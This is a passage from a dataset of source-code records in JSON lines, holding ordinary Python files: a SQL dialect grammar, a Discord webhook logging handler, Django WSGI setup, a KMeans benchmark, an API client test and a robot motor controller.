Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n bracket_pairs_set=\"angle_bracket_pairs\",\n bracket_type=\"angle\",\n ),\n ),\n )\n\n\n# Data Definition Statements\n# http://spark.apache.org/docs/latest/sql-ref-syntax-ddl.html\n@spark3_dialect.segment()\nclass AlterDatabaseStatementSegment(BaseSegment):\n \"\"\"An `ALTER DATABASE/SCHEMA` statement.\n\n http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-database.html\n \"\"\"\n\n type = \"alter_database_statement\"\n\n match_grammar = Sequence(\n \"ALTER\",\n OneOf(\"DATABASE\", \"SCHEMA\"),\n Ref(\"DatabaseReferenceSegment\"),\n \"SET\",\n Ref(\"DatabasePropertiesGrammar\"),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass AlterTableStatementSegment(BaseSegment):\n \"\"\"A `ALTER TABLE` statement to change the table schema or properties.\n\n http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-table.html\n \"\"\"\n\n type = \"alter_table_statement\"\n\n match_grammar = Sequence(\n \"ALTER\",\n \"TABLE\",\n Ref(\"TableReferenceSegment\"),\n OneOf(\n # ALTER TABLE - RENAME TO `table_identifier`\n Sequence(\n \"RENAME\",\n \"TO\",\n Ref(\"TableReferenceSegment\"),\n ),\n # ALTER TABLE - RENAME `partition_spec`\n Sequence(\n Ref(\"PartitionSpecGrammar\"),\n \"RENAME\",\n \"TO\",\n Ref(\"PartitionSpecGrammar\"),\n ),\n # ALTER TABLE - ADD COLUMNS\n Sequence(\n \"ADD\",\n \"COLUMNS\",\n Bracketed(\n Delimited(\n Ref(\"ColumnDefinitionSegment\"),\n ),\n ),\n ),\n # ALTER TABLE - ALTER OR CHANGE COLUMN\n Sequence(\n OneOf(\"ALTER\", \"CHANGE\"),\n \"COLUMN\",\n Ref(\"ColumnReferenceSegment\"),\n Sequence(\"TYPE\", Ref(\"DatatypeSegment\"), optional=True),\n Ref(\"CommentGrammar\", optional=True),\n OneOf(\n \"FIRST\",\n Sequence(\"AFTER\", Ref(\"ColumnReferenceSegment\")),\n optional=True,\n ),\n Sequence(OneOf(\"SET\", \"DROP\"), \"NOT NULL\", optional=True),\n ),\n # ALTER TABLE - ADD PARTITION\n Sequence(\n \"ADD\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n AnyNumberOf(Ref(\"PartitionSpecGrammar\")),\n ),\n # ALTER TABLE - DROP PARTITION\n Sequence(\n \"DROP\",\n Ref(\"IfExistsGrammar\", optional=True),\n Ref(\"PartitionSpecGrammar\"),\n Sequence(\"PURGE\", optional=True),\n ),\n # ALTER TABLE - REPAIR PARTITION\n Sequence(\"RECOVER\", \"PARTITIONS\"),\n # ALTER TABLE - SET PROPERTIES\n Sequence(\"SET\", Ref(\"TablePropertiesGrammar\")),\n # ALTER TABLE - UNSET PROPERTIES\n Ref(\"UnsetTablePropertiesGrammar\"),\n # ALTER TABLE - SET SERDE\n Sequence(\n Ref(\"PartitionSpecGrammar\", optional=True),\n \"SET\",\n OneOf(\n Sequence(\n \"SERDEPROPERTIES\",\n Ref(\"BracketedPropertyListGrammar\"),\n ),\n Sequence(\n \"SERDE\",\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n Ref(\"SerdePropertiesGrammar\", optional=True),\n ),\n ),\n ),\n # ALTER TABLE - SET FILE FORMAT\n Sequence(\n Ref(\"PartitionSpecGrammar\", optional=True),\n \"SET\",\n \"FILEFORMAT\",\n Ref(\"DataSourceFormatGrammar\"),\n ),\n # ALTER TABLE - CHANGE FILE LOCATION\n Sequence(\n Ref(\"PartitionSpecGrammar\"),\n \"SET\",\n Ref(\"LocationGrammar\"),\n ),\n ),\n )\n\n\n@spark3_dialect.segment()\nclass AlterViewStatementSegment(BaseSegment):\n \"\"\"A `ALTER VIEW` statement to change the view schema or properties.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-view.html\n \"\"\"\n\n type = \"alter_view_statement\"\n\n match_grammar = Sequence(\n \"ALTER\",\n \"VIEW\",\n Ref(\"TableReferenceSegment\"),\n OneOf(\n Sequence(\n \"RENAME\",\n \"TO\",\n Ref(\"TableReferenceSegment\"),\n ),\n Sequence(\"SET\", Ref(\"TablePropertiesGrammar\")),\n Ref(\"UnsetTablePropertiesGrammar\"),\n Sequence(\n \"AS\",\n OptionallyBracketed(Ref(\"SelectStatementSegment\")),\n ),\n ),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateDatabaseStatementSegment(BaseSegment):\n \"\"\"A `CREATE DATABASE` statement.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-database.html\n \"\"\"\n\n type = \"create_database_statement\"\n match_grammar = Sequence(\n \"CREATE\",\n OneOf(\"DATABASE\", \"SCHEMA\"),\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"DatabaseReferenceSegment\"),\n Ref(\"CommentGrammar\", optional=True),\n Ref(\"LocationGrammar\", optional=True),\n Sequence(\n \"WITH\", \"DBPROPERTIES\", Ref(\"BracketedPropertyListGrammar\"), optional=True\n ),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateFunctionStatementSegment(BaseSegment):\n \"\"\"A `CREATE FUNCTION` statement.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-function.html\n \"\"\"\n\n type = \"create_function_statement\"\n\n match_grammar = Sequence(\n \"CREATE\",\n Sequence(\"OR\", \"REPLACE\", optional=True),\n Ref(\"TemporaryGrammar\", optional=True),\n \"FUNCTION\",\n Anything(),\n )\n\n parse_grammar = Sequence(\n \"CREATE\",\n Sequence(\"OR\", \"REPLACE\", optional=True),\n Ref(\"TemporaryGrammar\", optional=True),\n \"FUNCTION\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"FunctionNameIdentifierSegment\"),\n \"AS\",\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n Ref(\"ResourceLocationGrammar\", optional=True),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateTableStatementSegment(BaseSegment):\n \"\"\"A `CREATE TABLE` statement using a Data Source or Like.\n\n http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-datasource.html\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-like.html\n \"\"\"\n\n type = \"create_table_statement\"\n\n match_grammar = Sequence(\n \"CREATE\",\n \"TABLE\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"TableReferenceSegment\"),\n OneOf(\n # Columns and comment syntax:\n Sequence(\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnDefinitionSegment\"),\n Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n ),\n ),\n # Like Syntax\n Sequence(\n \"LIKE\",\n Ref(\"TableReferenceSegment\"),\n ),\n optional=True,\n ),\n Sequence(\"USING\", Ref(\"DataSourceFormatGrammar\"), optional=True),\n Ref(\"RowFormatClauseSegment\", optional=True),\n Ref(\"StoredAsGrammar\", optional=True),\n Sequence(\"OPTIONS\", Ref(\"BracketedPropertyListGrammar\"), optional=True),\n Ref(\"PartitionSpecGrammar\", optional=True),\n Ref(\"BucketSpecGrammar\", optional=True),\n AnyNumberOf(\n Ref(\"LocationGrammar\", optional=True),\n Ref(\"CommentGrammar\", optional=True),\n Ref(\"TablePropertiesGrammar\", optional=True),\n ),\n # Create AS syntax:\n Sequence(\n \"AS\",\n OptionallyBracketed(Ref(\"SelectableGrammar\")),\n optional=True,\n ),\n )\n\n\n@spark3_dialect.segment()\nclass CreateHiveFormatTableStatementSegment(hive_dialect.get_segment(\"CreateTableStatementSegment\")): # type: ignore\n \"\"\"A `CREATE TABLE` statement using Hive format.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-hiveformat.html\n \"\"\"\n\n type = \"create_table_statement\"\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateViewStatementSegment(BaseSegment):\n \"\"\"A `CREATE VIEW` statement.\n\n https://spark.apache.org/docs/3.0.0/sql-ref-syntax-ddl-create-view.html#syntax\n \"\"\"\n\n type = \"create_view_statement\"\n\n match_grammar = Sequence(\n \"CREATE\",\n Ref(\"OrReplaceGrammar\", optional=True),\n Ref(\"TemporaryGrammar\", optional=True),\n \"VIEW\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"TableReferenceSegment\"),\n # Columns and comment syntax:\n Sequence(\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnReferenceSegment\"),\n Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n ),\n optional=True,\n ),\n Ref(\"CommentGrammar\", optional=True),\n Ref(\"TablePropertiesGrammar\", optional=True),\n \"AS\",\n Ref(\"SelectableGrammar\"),\n Ref(\"WithNoSchemaBindingClauseSegment\", optional=True),\n )\n\n\n@spark3_dialect.segment()\nclass DropFunctionStatementSegment(BaseSegment):\n \"\"\"A `DROP FUNCTION` STATEMENT.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-drop-function.html\n \"\"\"\n\n type = \"drop_function_statement\"\n\n match_grammar = Sequence(\n \"DROP\",\n Ref(\"TemporaryGrammar\", optional=True),\n \"FUNCTION\",\n Ref(\"IfExistsGrammar\", optional=True),\n Ref(\"FunctionNameSegment\"),\n )\n\n\n@spark3_dialect.segment()\nclass MsckRepairTableStatementSegment(hive_dialect.get_segment(\"MsckRepairTableStatementSegment\")): # type: ignore\n \"\"\"A `REPAIR TABLE` statement using Hive MSCK (Metastore Check) format.\n\n This class inherits from Hive since Spark leverages Hive format for this command and\n is dependent on the Hive metastore.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-repair-table.html\n \"\"\"\n\n type = \"msck_repair_table_statement\"\n\n\n# Auxiliary Statements\n@spark3_dialect.segment()\nclass AddExecutablePackage(BaseSegment):\n \"\"\"A `ADD JAR` statement.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-aux-resource-mgmt-add-jar.html\n \"\"\"\n\n type = \"add_executable_package\"\n\n match_grammar = Sequence(\n \"ADD\",\n Ref(\"ResourceFileGrammar\"),\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass StatementSegment(BaseSegment):\n \"\"\"Overriding StatementSegment to allow for additional segment parsing.\"\"\"\n\n match_grammar = ansi_dialect.get_segment(\"StatementSegment\").match_grammar.copy()\n\n parse_grammar = ansi_dialect.get_segment(\"StatementSegment\").parse_grammar.copy(\n # Segments defined in Spark3 dialect\n insert=[\n # Data Definition Statements\n Ref(\"AlterDatabaseStatementSegment\"),\n Ref(\"AlterTableStatementSegment\"),\n Ref(\"AlterViewStatementSegment\"),\n Ref(\"CreateHiveFormatTableStatementSegment\"),\n Ref(\"DropFunctionStatementSegment\"),\n Ref(\"MsckRepairTableStatementSegment\"),\n # Auxiliary Statements\n Ref(\"AddExecutablePackage\"),\n ],\n remove=[\n Ref(\"TransactionStatementSegment\"),\n Ref(\"CreateSchemaStatementSegment\"),\n Ref(\"SetSchemaStatementSegment\"),\n Ref(\"CreateExtensionStatementSegment\"),\n Ref(\"CreateModelStatementSegment\"),\n Ref(\"DropModelStatementSegment\"),\n ],\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass JoinClauseSegment(BaseSegment):\n \"\"\"Any number of join clauses, including the `JOIN` keyword.\n\n https://spark.apache.org/docs/3.0.0/sql-ref-syntax-qry-select-join.html\n TODO: Add NATURAL JOIN syntax.\n \"\"\"\n\n type = \"join_clause\"\n match_grammar = Sequence(\n # NB These qualifiers are optional\n # TODO: Allow nested joins like:\n # ....FROM S1.T1 t1 LEFT JOIN ( S2.T2 t2 JOIN S3.T3 t3 ON t2.col1=t3.col1) ON tab1.col1 = tab2.col1\n OneOf(\n \"CROSS\",\n \"INNER\",\n Sequence(\n OneOf(\n \"FULL\",\n \"LEFT\",\n \"RIGHT\",\n ),\n Ref.keyword(\"OUTER\", optional=True),\n ),\n Sequence(\n Ref.keyword(\"LEFT\", optional=True),\n \"SEMI\",\n ),\n Sequence(\n Ref.keyword(\"LEFT\", optional=True),\n \"ANTI\",\n ),\n optional=True,\n ),\n Ref(\"JoinKeywords\"),\n Indent,\n Sequence(\n Ref(\"FromExpressionElementSegment\"),\n Conditional(Dedent, indented_using_on=False),\n # NB: this is optional\n OneOf(\n # ON clause\n Ref(\"JoinOnConditionSegment\"),\n # USING clause\n Sequence(\n \"USING\",\n Indent,\n Bracketed(\n # NB: We don't use BracketedColumnReferenceListGrammar\n # here because we're just using SingleIdentifierGrammar,\n # rather than ObjectReferenceSegment or ColumnReferenceSegment.\n # This is a) so that we don't lint it as a reference and\n # b) because the column will probably be returned anyway\n # during parsing.\n Delimited(\n Ref(\"SingleIdentifierGrammar\"),\n ephemeral_name=\"UsingClauseContents\",\n )\n ),\n Dedent,\n ),\n # Unqualified joins *are* allowed. They just might not\n # be a good idea.\n optional=True,\n ),\n Conditional(Indent, indented_using_on=False),\n ),\n Dedent,\n )\n\n get_eventual_alias = ansi_dialect.get_segment(\n \"JoinClauseSegment\"\n ).get_eventual_alias\n"} {"ext": "py", "sha": "1a3063674cfe6bb6c2581bacbbe4161e01ec982e", "content": "\"\"\"A logging handler that emits to a Discord webhook.\"\"\"\nimport requests\nfrom logging import Handler\n\n\nclass DiscordHandler(Handler):\n \"\"\"A logging handler that emits to a Discord webhook.\"\"\"\n\n def __init__(self, webhook, *args, **kwargs):\n \"\"\"Initialize the DiscordHandler class.\"\"\"\n super().__init__(*args, **kwargs)\n self.webhook = webhook\n\n def emit(self, record):\n \"\"\"Emit record to the Discord webhook.\"\"\"\n json = {\"content\": self.format(record)}\n try:\n requests.post(self.webhook, json=json)\n except requests.RequestException:\n self.handleError(record)\n"} {"ext": "py", "sha": "1a306439e1e21796c88bf2b1c2a129203d4a3ca3", "content": "\"\"\"\nWSGI config for pithyquotes project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/\n\"\"\"\n\nimport os\n\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pithyquotes.settings')\n\napplication = get_wsgi_application()\n"} {"ext": "py", "sha": "1a3064c7f1f7f412193da4007d0f5810f165c1e5", "content": "\"\"\" Class to initialize common objects. \"\"\"\n\nimport pickle\nfrom pathlib import Path\n\n################################################################\nclass Init():\n\n #---------------------------------------------------------------\n # Constructor\n #---------------------------------------------------------------\n def __init__(self, workdir, **kwargs):\n\n print('Init class created.')\n \n self.workdir = Path(workdir)\n self.cachedir = self.workdir / 'cache'\n print('workdir: {}'.format(self.workdir))\n print('cachedir: {}'.format(self.cachedir))\n\n #---------------------------------------------------------------\n # Initialize settings as class members of obj\n #---------------------------------------------------------------\n def Initialize(self, obj):\n\n obj.workdir = self.workdir\n obj.cachedir = self.cachedir\n obj.cachedir.mkdir(parents=True, exist_ok=True)\n\n obj.AllData = pickle.load((obj.workdir / 'default.p').open('rb'))\n\n #: Sets the collision systems for the entire project,\n #: where each system is a string of the form\n #: ``''``,\n #: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.\n #: Even if the project uses only a single system,\n #: this should still be a list of one system string.\n obj.systems = obj.AllData[\"systems\"]\n\n #: Design attribute. This is a list of\n #: strings describing the inputs.\n #: The default is for the example data.\n obj.keys = obj.AllData[\"keys\"]\n\n #: Design attribute. This is a list of input\n #: labels in LaTeX for plotting.\n #: The default is for the example data.\n obj.labels = obj.AllData[\"labels\"]\n\n #: Design attribute. This is list of tuples of\n #: (min,max) for each design input.\n #: The default is for the example data.\n obj.ranges = obj.AllData[\"ranges\"]\n\n #: Design array to use - should be a numpy array.\n #: Keep at None generate a Latin Hypercube with above (specified) range.\n #: Design array for example is commented under default.\n obj.design_array = obj.AllData[\"design\"]\n\n #: Dictionary of the model output.\n #: Form MUST be data_list[system][observable][subobservable][{'Y': ,'x': }].\n #: 'Y' is an (n x p) numpy array of the output.\n #:\n #: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.\n #: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example.\n obj.data_list = obj.AllData[\"model\"]\n\n #: Dictionary for the model validation output\n #: Must be the same for as the model output dictionary\n #data_list_val = pickle.load((cachedir / 'model/validation/data_dict_val.p').open('rb'))\n obj.data_list_val = None\n\n #: Dictionary of the experimental data.\n #: Form MUST be exp_data_list[system][observable][subobservable][{'y':,'x':,'yerr':{'stat':,'sys'}}].\n #: 'y' is a (1 x p) numpy array of experimental data.\n #:\n #: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.\n #:\n #: 'yerr' is a dictionary with keys 'stat' and 'sys'.\n #:\n #: 'stat' is a (1 x p) array of statistical errors.\n #:\n #: 'sys' is a (1 x p) array of systematic errors.\n #: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example.\n obj.exp_data_list = obj.AllData[\"data\"]\n\n #: Experimental covariance matrix.\n #: Set exp_cov = None to have the script estimate the covariance matrix.\n #: Example commented below default.\n obj.exp_cov = obj.AllData[\"cov\"]\n\n\n #: Observables to emulate as a list of 2-tuples\n #: ``(obs, [list of subobs])``.\n obj.observables = obj.AllData[\"observables\"]\n\n #---------------------------------------------------------------\n # Initialize settings as class members of obj\n #---------------------------------------------------------------\n def systems(self):\n\n AllData = pickle.load((self.workdir / 'default.p').open('rb'))\n\n #: Sets the collision systems for the entire project,\n #: where each system is a string of the form\n #: ``''``,\n #: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.\n #: Even if the project uses only a single system,\n #: this should still be a list of one system string.\n return AllData[\"systems\"]\n\n #---------------------------------------------------------------\n # Return formatted string of class members\n #---------------------------------------------------------------\n def __str__(self):\n s = []\n variables = self.__dict__.keys()\n for v in variables:\n s.append('{} = {}'.format(v, self.__dict__[v]))\n return \"[i] {} with \\n . {}\".format(self.__class__.__name__, '\\n . '.join(s))\n"} {"ext": "py", "sha": "1a30660a357a742b4906447a5ec3c5d7baf05f8c", "content": "#===============================================================================\n# Copyright 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n\nimport sys\nimport os\nimport argparse\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport bench\n\nimport numpy as np\nfrom cuml import KMeans\nimport warnings\nfrom sklearn.metrics.cluster import davies_bouldin_score\n\nwarnings.filterwarnings('ignore', category=FutureWarning)\nparser = argparse.ArgumentParser(description='cuML K-means benchmark')\nparser.add_argument('-i', '--filei', '--fileI', '--init',\n type=str, help='Initial clusters')\nparser.add_argument('-t', '--tol', type=float, default=0.,\n help='Absolute threshold')\nparser.add_argument('--maxiter', type=int, default=100,\n help='Maximum number of iterations')\nparser.add_argument('--samples-per-batch', type=int, default=32768,\n help='Maximum number of iterations')\nparser.add_argument('--n-clusters', type=int, help='Number of clusters')\nparams = bench.parse_args(parser, prefix='cuml', loop_types=('fit', 'predict'))\n\n# Load and convert generated data\nX_train, X_test, _, _ = bench.load_data(params)\n\nif params.filei == 'k-means++':\n X_init = 'k-means++'\n# Load initial centroids from specified path\nelif params.filei is not None:\n X_init = np.load(params.filei).astype(params.dtype)\n params.n_clusters = X_init.shape[0]\n# or choose random centroids from training data\nelse:\n np.random.seed(params.seed)\n centroids_idx = np.random.randint(0, X_train.shape[0],\n size=params.n_clusters)\n if hasattr(X_train, \"iloc\"):\n X_init = X_train.iloc[centroids_idx].to_pandas().values\n else:\n X_init = X_train[centroids_idx]\n\n\n# Workaround for cuML kmeans fail\n# when second call of 'fit' method causes AttributeError\ndef kmeans_fit(X):\n alg = KMeans(n_clusters=params.n_clusters, tol=params.tol,\n max_iter=params.maxiter, init=X_init,\n max_samples_per_batch=params.samples_per_batch)\n alg.fit(X)\n return alg\n\n\n# Time fit\nfit_time, kmeans = bench.measure_function_time(kmeans_fit, X_train, params=params)\ntrain_predict = kmeans.predict(X_train)\n\n# Time predict\npredict_time, test_predict = bench.measure_function_time(kmeans.predict, X_test,\n params=params)\n\nX_train_host = bench.convert_to_numpy(X_train)\ntrain_predict_host = bench.convert_to_numpy(train_predict)\nacc_train = davies_bouldin_score(X_train_host, train_predict_host)\n\nX_test_host = bench.convert_to_numpy(X_test)\ntest_predict_host = bench.convert_to_numpy(test_predict)\n\nacc_test = davies_bouldin_score(X_test_host, test_predict_host)\n\nbench.print_output(library='cuml', algorithm='kmeans',\n stages=['training', 'prediction'], params=params,\n functions=['KMeans.fit', 'KMeans.predict'],\n times=[fit_time, predict_time], accuracy_type='davies_bouldin_score',\n accuracies=[acc_train, acc_test], data=[X_train, X_test],\n alg_instance=kmeans)\n"} {"ext": "py", "sha": "1a306643f9ad0da5aa548ab1e69afefd9221d1cb", "content": "\nfrom .telescope import Telescope\n"} {"ext": "py", "sha": "1a30669c1014b48ab05ee7bc1ad54bd77277dc4b", "content": "from mcstats import mcstats\n\nmcstats.registry.append(\n mcstats.MinecraftStat(\n 'pot_flower',\n {\n 'title': 'Florist',\n 'desc': 'Flowers potted',\n 'unit': 'int',\n },\n mcstats.StatReader(['minecraft:custom','minecraft:pot_flower'])\n ))\n"} {"ext": "py", "sha": "1a3066fc013335596af9d8b9f78143f165a75b42", "content": "import unittest\n\nfrom social_apis.networks.twitter_v2 import Twitter2\nfrom config import tw_access_token\n\n\nclass TestTwitter2(unittest.TestCase):\n\n def setUp(self):\n self.tweet_ids = ['1261326399320715264', '1278347468690915330']\n self.api = Twitter2(access_token=tw_access_token)\n\n def test_get_tweet(self):\n self.api.get_tweet(id=self.tweet_ids[0])\n\n def test_get_tweets(self):\n self.api.get_tweets(ids=self.tweet_ids)\n\n def test_get_compliance_jobs(self):\n self.api.get_compliance_jobs(type='tweets')\n\n def test_quota_parsing(self):\n self.api.get_compliance_jobs(type='tweets')\n self.assertIsNotNone(self.api.get_quota())\n\n"} {"ext": "py", "sha": "1a3067196b0820719f7f46d6048545e8d5f4a48d", "content": "#! /usr/bin/env python\n\n# Copyright (c) 2014, Dawn Robotics Ltd\n# All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without \n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above copyright notice, \n# this list of conditions and the following disclaimer in the documentation \n# and/or other materials provided with the distribution.\n\n# 3. Neither the name of the Dawn Robotics Ltd nor the names of its contributors \n# may be used to endorse or promote products derived from this software without \n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED \n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport logging\nimport math\nimport time\nimport Queue\nimport mini_driver\nimport threading\n\n#--------------------------------------------------------------------------------------------------- \nclass RobotController:\n \n MIN_ANGLE = 0.0\n MAX_ANGLE = 180.0\n CENTRE_ANGLE = (MIN_ANGLE + MAX_ANGLE)/2.0\n \n MAX_UPDATE_TIME_DIFF = 0.25\n TIME_BETWEEN_SERVO_SETTING_UPDATES = 1.0\n TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES = 0.5\n \n JOYSTICK_DEAD_ZONE = 0.1\n MAX_ABS_NECK_SPEED = 30.0 # Degrees per second\n \n MOTION_COMMAND_TIMEOUT = 2.0 # If no commands for the motors are recieved in this time then\n # the motors (drive and servo) are set to zero speed\n \n #-----------------------------------------------------------------------------------------------\n def __init__( self, robotConfig ):\n \n self.miniDriver = mini_driver.MiniDriver()\n connected = self.miniDriver.connect()\n if not connected:\n raise Exception( \"Unable to connect to the mini driver\" )\n \n self.robotConfig = robotConfig\n self.leftMotorSpeed = 0\n self.rightMotorSpeed = 0\n self.panAngle = self.CENTRE_ANGLE\n self.tiltAngle = self.CENTRE_ANGLE\n \n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n self.lastServoSettingsSendTime = 0.0\n self.lastSensorConfigurationSendTime = 0.0\n self.lastUpdateTime = 0.0\n self.lastMotionCommandTime = time.time()\n \n self.piSensorModuleName = \"\"\n self.piSensorModule = None\n self.piSensorReader = None\n self.piSensorDict = {}\n \n #-----------------------------------------------------------------------------------------------\n def __del__( self ):\n \n self.disconnect()\n \n #-----------------------------------------------------------------------------------------------\n def disconnect( self ):\n \n self.miniDriver.disconnect()\n \n #-----------------------------------------------------------------------------------------------\n def getStatusDict( self ):\n \n presetMaxAbsMotorSpeed, presetMaxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()\n \n statusDict = {\n \"batteryVoltage\" : self.miniDriver.getBatteryVoltageReading().data,\n \"presetMaxAbsMotorSpeed\" : presetMaxAbsMotorSpeed,\n \"presetMaxAbsTurnSpeed\" : presetMaxAbsTurnSpeed,\n \"sensors\" : self.getSensorDict()\n }\n \n return statusDict\n \n #-----------------------------------------------------------------------------------------------\n def getSensorDict( self ):\n \n sensorDict = {\n \"batteryVoltage\" : self.miniDriver.getBatteryVoltageReading(),\n \"digital\" : self.miniDriver.getDigitalReadings(),\n \"analog\" : self.miniDriver.getAnalogReadings(),\n \"ultrasonic\" : self.miniDriver.getUltrasonicReading(),\n \"encoders\" : self.miniDriver.getEncodersReading(),\n }\n \n sensorDict.update( self.piSensorDict )\n \n return sensorDict\n \n #-----------------------------------------------------------------------------------------------\n def normaliseJoystickData( self, joystickX, joystickY ):\n \n stickVectorLength = math.sqrt( joystickX**2 + joystickY**2 )\n if stickVectorLength > 1.0:\n joystickX /= stickVectorLength\n joystickY /= stickVectorLength\n \n if stickVectorLength < self.JOYSTICK_DEAD_ZONE:\n joystickX = 0.0\n joystickY = 0.0\n \n return ( joystickX, joystickY )\n \n #-----------------------------------------------------------------------------------------------\n def centreNeck( self ):\n \n self.panAngle = self.CENTRE_ANGLE\n self.tiltAngle = self.CENTRE_ANGLE\n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n #-----------------------------------------------------------------------------------------------\n def setMotorJoystickPos( self, joystickX, joystickY ):\n \n joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )\n \n if self.robotConfig.usePresetMotorSpeeds:\n \n maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()\n \n else:\n \n maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed\n maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed\n \n # Set forward speed from joystickY\n leftMotorSpeed = maxAbsMotorSpeed*joystickY\n rightMotorSpeed = maxAbsMotorSpeed*joystickY\n \n # Set turn speed from joystickX\n leftMotorSpeed += maxAbsTurnSpeed*joystickX\n rightMotorSpeed -= maxAbsTurnSpeed*joystickX\n \n leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )\n rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )\n \n self.leftMotorSpeed = leftMotorSpeed*self.robotConfig.leftMotorScale\n self.rightMotorSpeed = rightMotorSpeed\n \n self.lastMotionCommandTime = time.time()\n \n #-----------------------------------------------------------------------------------------------\n def setMotorSpeeds( self, leftMotorSpeed, rightMotorSpeed ):\n \n if self.robotConfig.usePresetMotorSpeeds:\n \n maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()\n \n else:\n \n maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed\n maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed\n \n self.leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )\n self.rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )\n \n self.lastMotionCommandTime = time.time()\n \n #-----------------------------------------------------------------------------------------------\n def setNeckJoystickPos( self, joystickX, joystickY ):\n \n joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )\n \n # Set pan and tilt angle speeds\n self.panSpeed = -self.MAX_ABS_NECK_SPEED*joystickX\n self.tiltSpeed = -self.MAX_ABS_NECK_SPEED*joystickY\n \n self.lastMotionCommandTime = time.time()\n \n #-----------------------------------------------------------------------------------------------\n def setNeckAngles( self, panAngle, tiltAngle ):\n \n self.panAngle = max( self.MIN_ANGLE, min( panAngle, self.MAX_ANGLE ) )\n 